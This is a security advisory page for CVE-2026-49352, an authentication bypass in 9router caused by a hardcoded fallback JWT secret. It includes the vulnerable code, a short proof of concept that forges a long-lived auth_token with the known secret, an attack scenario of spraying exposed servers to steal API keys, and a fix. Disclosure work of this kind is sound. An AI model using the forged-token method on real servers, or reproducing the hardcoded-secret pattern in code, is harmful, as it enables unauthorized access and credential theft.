Loading...
Skip to main content

CVE-2026-49352

CRITICAL

9router's Hardcoded Default fallback JWT Secret Allows Authentication Bypass

Published July 2, 2026Updated July 2, 2026Source: osv

Summary

### Summary 9router uses a publicly known hardcoded string `"9router-default-secret-change-me"` as the fallback of JWT secret for all Dashboard session JWTs when the `JWT_SECRET` environment variable is not set. Because this secret is committed in the public repository and unchanged across all releases, any unauthenticated remote attacker can forge a valid `auth_token` cookie and gain full access to dashboard and api (If JWT_SECRET is not set on server) . This vulnerable affected so many public 9router server ### Details | Versions | File | Note | |---|---|---| | `>= 0.2.21, <= 0.4.30` | `src/app/api/auth/login/route.js` + `src/middleware.js` | Introduced in commit `23cfb19` | | `>= 0.4.31, <= 0.4.41` | `src/lib/auth/dashboardSession.js` | Relocated by OIDC refactor `c3d91b0`, secret unchanged | Vulnerable Code **v0.2.21 – v0.4.30** — `src/app/api/auth/login/route.js` and `src/middleware.js`: ```js const SECRET = new TextEncoder().encode( process.env.JWT_SECRET || "9router-default-secret-change-me" ); ``` **v0.4.31 – v0.4.41 (current)** — `src/lib/auth/dashboardSession.js` (centralized via OIDC refactor, commit `c3d91b0`): ```js const SECRET = new TextEncoder().encode( process.env.JWT_SECRET || "9router-default-secret-change-me" ); ``` The fallback string was introduced in commit `23cfb19` (2026-01-09) and has never been removed. The OIDC refactor in `c3d91b0` only relocated it to a shared module . This vulnerability has existed since 9router first introduced authentication. ### PoC **Step 1.** Craft a JWT signed with the known default secret: ```js import { SignJWT } from "jose"; const SECRET = new TextEncoder().encode("9router-default-secret-change-me"); const token = await new SignJWT({ authenticated: true }) .setProtectedHeader({ alg: "HS256" }) .setIssuedAt() .setExpirationTime("36y") .sign(SECRET); console.log(token); // example a valid auth_token=eyJhbGciOiJIUzI1NiJ9.eyJhdXRoZW50aWNhdGVkIjp0cnVlLCJpYXQiOjE3Nzg3Njk4NTYsImV4cCI6MjkxNDg0MzQ1Nn0.enMLEqYZKFuzxkmRH6qd3E-Ub-20wOjmiEfP4KyIG6w ``` **Step 2.** Set the forged token as the `auth_token` cookie. And access the `http://<target>/dashboard` - completely authentication bypass ### Attack Scenario: - Attacker can use this JWT to spray to all server that they found in the internet and gain dashboard access if a server doesn't set JWT_SECRET - Then they can steal valuable API Key , Auth Token via http:// target /api/settings/database ### Impact - A successful attack grants attacker **full API Key, Auth Token** that 9router hold - They can **read** 9router apikey, **change** 9router password ,shutdown 9router, **Modify** everything - **Pivot** via the MCP stdio→SSE bridge exposed at `/api/mcp/` (exploit CVE-2026-46339) ## Recommended Fix **Require** `JWT_SECRET` at startup and fail fast rather than falling back silently: ```js const jwtSecret = process.env.JWT_SECRET; if (!jwtSecret) { throw new Error( "JWT_SECRET environment variable is not set. " + "Generate one with: openssl rand -hex 32" ); } const SECRET = new TextEncoder().encode(jwtSecret); ``` Alternatively, auto-generate a random secret on first boot and persist it to the data directory — but **never** fall back to a publicly known constant.

Remediation

Upgrade to the fixed version using your package manager.

npm
Update 9router to 0.4.45 or later
npm install 9router@0.4.45

After upgrading, run your dependency scanner again to confirm the vulnerability is resolved.

Affected Packages (1)

PackageEcosystemAffectedFixed In
9router
npm
All versions0.4.45

Vulnerability Classification

Common Weakness Enumeration (CWE) identifiers for this vulnerability type.

  • CWE-798
    Use of Hard-coded CredentialsMITRE

CVSS Score Breakdown

What the CVSS (Common Vulnerability Scoring System) 9.8 score means for each attack dimension.

Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Frequently Asked Questions

What is CVE-2026-49352?
9router's Hardcoded Default fallback JWT Secret Allows Authentication Bypass This vulnerability has been assigned a severity rating of CRITICAL (CVSS score: 9.8/10).
How do I check if my project is affected by CVE-2026-49352?
CVE-2026-49352 affects 9router. Use GeekWala's free vulnerability scanner to check your dependencies against CVE-2026-49352 and 200,000+ other known vulnerabilities.

Severity & Exploitability

CVSS Score
9.8

Exploitation is straightforward and causes maximum impact. Patch immediately.

Also Known As

GHSA-jphh-m39h-6gwx

Related CVEs

  • CVE-2026-77414
    CRITICAL

    JSONata vulnerable to Arbitrary Code Execution via crafted JSONata expressions

  • CVE-2026-77415
    CRITICAL

    JSONata vulnerable to Arbitrary Code Execution via crafted JSONata expressions

  • CVE-2026-77413
    CRITICAL

    JSONata: Arbitrary Code Execution via crafted JSONata expressions

  • CVE-2026-46339
    CRITICAL

    9router: Unauthenticated Remote Code Execution via unprotected MCP custom plugin routes

  • CVE-2026-59800
    CRITICAL

    9router: Missing Authorization and OS Command Injection

  • CVE-2026-55500
    CRITICAL

    9routers has Exposure of Sensitive Information and Unprotected Database Import/Export, Allowing Complete Credential Theft and Database Takeover

  • CVE-2026-59801
    CRITICAL

    9router has unauthenticated CRUD on /api/providers and Full API Key Leak via /api/usage/stats

  • CVE-2026-56677
    HIGH

    9Router: Authenticated Server-Side Request Forgery (SSRF) via OIDC Provider Test Endpoint

Check if you're affected

Scan your dependencies to see if this vulnerability affects your projects.

Scan Your Dependencies